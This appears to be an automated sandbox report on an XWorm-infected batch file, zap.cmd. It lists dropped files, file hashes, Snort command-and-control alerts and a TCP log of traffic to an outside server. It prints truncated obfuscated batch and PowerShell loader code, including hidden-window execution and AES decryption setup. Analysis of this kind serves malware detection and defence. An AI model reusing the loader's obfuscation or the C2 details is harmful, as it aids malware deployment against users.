SHA-512:	7D0B89E6734C2FAA3BBCD0DC784E2A348019695404C4B9DFA4C9AEA8570BEA2EC80B3A72B53520241097C9F620A4867D15587C9C32BD5482BC38CAADD98B220D
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="336213" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	9713
Entropy (8bit):	4.940954773740904
Encrypted:	false
SSDEEP:	192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
MD5:	BA7C69EBE30EC7DA697D2772E36A746D
SHA1:	DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
SHA-256:	CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
SHA-512:	E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	3056
Entropy (8bit):	5.465515946139154
Encrypted:	false
SSDEEP:	48:CAzsSU4y4RQmFoUeCamfm9qr9t5/78NKRwS4GxJZKaVEouYAgwd64rHLjtv5/G+v:CAzlHyIFKL2O9qrh7KKRwSJ5Eo9Adrxj
MD5:	2E5BCE07104547FE87397C8EAA3BA817
SHA1:	A2F2D555B3C08681427546C57E311E802A4F8025
SHA-256:	9DF2A6BDD89423BBC9661A09C46FC35E8626F525E7DA41B9D1286AB75835931E
SHA-512:	FBB8063CD45BA3009CBF170E6CF6DADA809D0D9E6849FE0BA2C93AE9E0692BEF5BB2A8605C8B41E595ACE541D02F3618332FB408461D51D1519C9CAE0BDC0155
Malicious:	false
Preview:	@...e...........................................................H..............@-....f.J.\|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1i1bzk0n.pwe.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2scwnrxj.flu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kg0slv3m.sqh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qg1oghzr.2er.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.417451149003753
Encrypted:	false
SSDEEP:	6144:Icifpi6ceLPL9skLmb0mNSWSPtaJG8nAgex285i2MMhA20X4WABlGuN/5+:9i58NSWIZBk2MM6AFB1o
MD5:	A767A3F400D89D7A505D088E59DB7511
SHA1:	6245DC743539DB090C2EE9CE4894C56489C6DAED
SHA-256:	6F28B2C2C8E5AF0DEDA143A5AA3511AC3174B21D1E4783FADEF27A17EC067509
SHA-512:	9960902FD570B71322595AD42DFCFE5761475A511A9739A40A2840A43BAC6B306E1D68C2865E7D9BA1EB4F90C298D233F4E67753CEF27EBDEAB085FB386E4812
Malicious:	false
Preview:	regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...)P...............................................................................................................................................................................................................................................................................................................................................dQ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (2153), with CRLF line terminators
Category:	dropped
Size (bytes):	2155
Entropy (8bit):	5.792700355706426
Encrypted:	false
SSDEEP:	48:Pd7sK7UwESZLtuRrEw3RQR2RxAjBkB+HlSnmkGkFbxTKjlMPoJ9PJtrWt4:rhH1gRN32Q7SBkB2GbxTYlMPS9PJ64
MD5:	74DDD2A5DD878386C9B89E34FC646D54
SHA1:	FE4964643C81694F5A862CED2A1B0F16C116BC57
SHA-256:	86978F98A9E0480E2E50FB643893DE594D287B26FB45EE845B198F80B255164E
SHA-512:	F9E839E155A7BBBD09080189B3258A1070B32DA9CAB6B4AB4C0B0CF52002D9863B655AFD3CD632264AC05E45BDD260F5344DD0C6EB4BB08D1B5AAD5FD9B69CEB
Malicious:	false
Preview:	$host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\zap.cmd';$CMIY='ReazBIWdzBIWLzBIWinzBIWeszBIW'.Replace('zBIW', ''),'LXpsBoadXpsB'.Replace('XpsB', ''),'CXFxWopXFxWyTXFxWoXFxW'.Replace('XFxW', ''),'ChSZNiaSZNinSZNigSZNieExSZNiteSZNinSZNisiSZNionSZNi'.Replace('SZNi', ''),'DecehEzompehEzrehEzeehEzssehEz'.Replace('ehEz', ''),'EleFRIUmenFRIUtFRIUAFRIUtFRIU'.Replace('FRIU', ''),'InwXPBvowXPBkwXPBewXPB'.Replace('wXPB', ''),'GeAzGItCAzGIurAzGIrenAzGItAzGIPAzGIrocAzGIessAzGI'.Replace('AzGI', ''),'SWavzpWavzliWavztWavz'.Replace('Wavz', ''),'TrQRjDaQRjDnsQRjDfQRjDorQRjDmFiQRjDnQRjDaQRjDlQRjDBQRjDlQRjDoQRjDckQRjD'.Replace('QRjD', ''),'EQBEyntQBEyrQBEyyPQBEyoiQBEyntQBEy'.Replace('QBEy', ''),'CfrRUrefrRUatfrRUeDfrRUecrfrRUyptfrRUorfrRU'.Replace('frRU', ''),'FrostbEmBastbEse6stbE4SstbEtrstbEinstbEgstbE'.Replace('stbE', ''),'MlFlLailFlLnMlFlLolFlLdlFlLullFlLelFlL'.Replace('lFlL', '');powershell -w hidden;function iadMU($QWytb){$xHhyf=[System.Security.Cryptography.Aes]::Create();$xHhyf.Mode=[Syst

Static File Info

General

File type:	ASCII text, with very long lines (29358), with CRLF line terminators
Entropy (8bit):	5.992887775644416
TrID:
File name:	zap.cmd
File size:	67'216 bytes
MD5:	85c9311ae0014ac8bb98089d0bd51bdc
SHA1:	5140e9beda6014b02df3c09f84a284f9c25532ca
SHA256:	152cbca849779c40fe6673458a9e25e4be0b080f7cb4db8cfee5a88cec74b1e5
SHA512:	f202a1e07afb444e5264cd28f7c0eedd55a3d002d14f989bf9fb065fd451be1df6197b5dcb61c616e8dbd1d3ba43cdc058192c89858c8bc292c199d5e8e9fb54
SSDEEP:	768:std2pH1E6G5dMQzfwXLyVM0rAQiB/tp6UTGKxHHVpMGgJxhvtsQekLpzmWnfCB3Q:fpH1E6YrfDSF+UaaLtE1sQeAJ2Zlg9
TLSH:	EA63E03B1694FAE9F0894C574528F15783A1A77276BBE06F8DA03F99C538344A3FC05A
File Content Preview:	start /min /b cmd /c \"set __=^&rem\..set "bmZQeGNq=setLKVYY elLKVYYNTVLKVYYA==LKVYY=LKVYY1LKVYY LKVYY&LKVYY& LKVYYstLKVYYartLKVYY "LKVYY" /LKVYYmiLKVYYnLKVYY LKVYY"..set "blJWUkNW=&&LKVYY exLKVYYitLKVYY"..set "aUdKR3Ja=noLKVYYt LKVYYdLKVYYeLKVYYfiLKVYYne

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/23/24-21:08:05.951304	TCP	2852870	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes	8896	49701	12.202.180.134	192.168.2.7
05/23/24-21:06:17.058409	TCP	2855924	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49701	8896	192.168.2.7	12.202.180.134
05/23/24-21:08:05.057435	TCP	2852923	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	49701	8896	192.168.2.7	12.202.180.134
05/23/24-21:07:43.385208	TCP	2853193	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49701	8896	192.168.2.7	12.202.180.134
05/23/24-21:08:05.951304	TCP	2852874	ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2	8896	49701	12.202.180.134	192.168.2.7

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 23, 2024 21:06:03.532166958 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:06:03.537424088 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:06:03.537529945 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:06:04.052820921 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:06:04.059598923 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:06:05.942042112 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:06:05.992744923 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:06:17.058408976 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:06:17.065305948 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:06:17.251718998 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:06:17.253647089 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:06:17.260008097 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:06:30.071763992 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:06:30.076845884 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:06:30.246822119 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:06:30.250978947 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:06:30.255997896 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:06:35.987581015 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:06:36.040086985 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:06:43.087567091 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:06:43.305825949 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:06:43.336407900 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:06:43.342010021 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:06:43.510999918 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:06:43.512609005 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:06:43.564196110 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:06:56.103215933 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:06:56.175570011 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:06:56.300703049 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:06:56.302833080 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:06:56.359570026 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:05.968445063 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:06.009347916 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:09.119942904 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:09.144726992 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:09.316328049 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:09.318000078 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:09.322923899 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:16.931803942 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:17.165745974 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:17.478290081 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:17.701005936 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:17.701019049 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:17.701030016 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:17.871983051 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:17.875617981 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:17.884006023 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:17.996932030 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:17.998709917 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:18.012022972 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:18.012096882 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:18.018062115 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:22.087965012 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:22.093056917 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:22.265675068 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:22.267359018 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:22.272419930 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:22.666265965 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:22.671319962 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:22.852286100 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:22.854015112 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:22.858977079 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:23.463098049 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:23.711580038 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:23.754137039 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:23.759069920 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:23.929193020 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:23.930702925 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:23.935630083 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:27.353674889 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:27.361824989 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:27.554734945 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:27.559748888 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:27.573247910 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:27.731736898 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:27.737020016 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:27.775759935 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:27.781213045 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:28.114017010 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:28.119174957 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:28.119435072 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:28.121578932 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:28.127748966 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:28.167402983 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:28.171749115 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:28.182252884 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:28.978965998 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:28.988673925 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:29.169912100 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:29.171660900 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:29.198014021 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:30.509939909 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:30.515094042 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:30.699682951 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:30.744060040 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:30.875514030 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:30.880438089 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:32.775501013 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:32.780724049 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:32.822438955 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:32.828752041 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:32.853682041 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:32.861915112 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:32.916183949 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:32.928570032 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:32.963089943 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:32.967679024 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:33.021430969 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:33.021492958 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:33.026489973 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:33.026547909 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:33.031485081 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:33.060221910 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:33.062027931 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:33.115952969 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:33.119307995 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:33.175369024 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:33.175410986 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:33.177202940 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:33.231318951 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:33.231336117 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:33.231401920 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:33.236355066 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:33.236412048 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:33.242511988 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:33.331253052 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:33.332632065 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:33.345765114 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:33.345844030 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:33.403449059 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:33.661211014 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:33.665182114 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:33.670185089 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:33.776473045 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:33.781160116 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:33.786140919 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:35.949950933 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:36.089860916 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:43.385207891 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:43.392090082 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:43.447593927 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:43.453105927 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:43.588855982 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:43.593389988 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:43.599461079 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:43.681546926 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:43.682991982 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:43.688411951 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:48.729619980 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:48.737138987 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:48.918195963 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:48.935620070 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:48.940726042 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:48.963494062 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:48.973360062 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:49.135279894 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:49.142947912 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:49.182161093 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:49.187210083 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:49.262150049 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:49.263699055 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:49.271328926 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:49.361737967 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:49.365080118 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:49.371366978 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:49.464217901 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:49.465353012 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:49.470391989 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:51.400897980 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:51.407500982 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:51.585464001 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:51.592032909 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:51.598870993 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:51.713491917 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:51.718473911 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:51.905548096 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:07:51.909616947 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:07:51.917067051 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:08:04.729159117 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:08:04.737320900 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:08:05.053446054 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:08:05.057435036 CEST	49701	8896	192.168.2.7	12.202.180.134
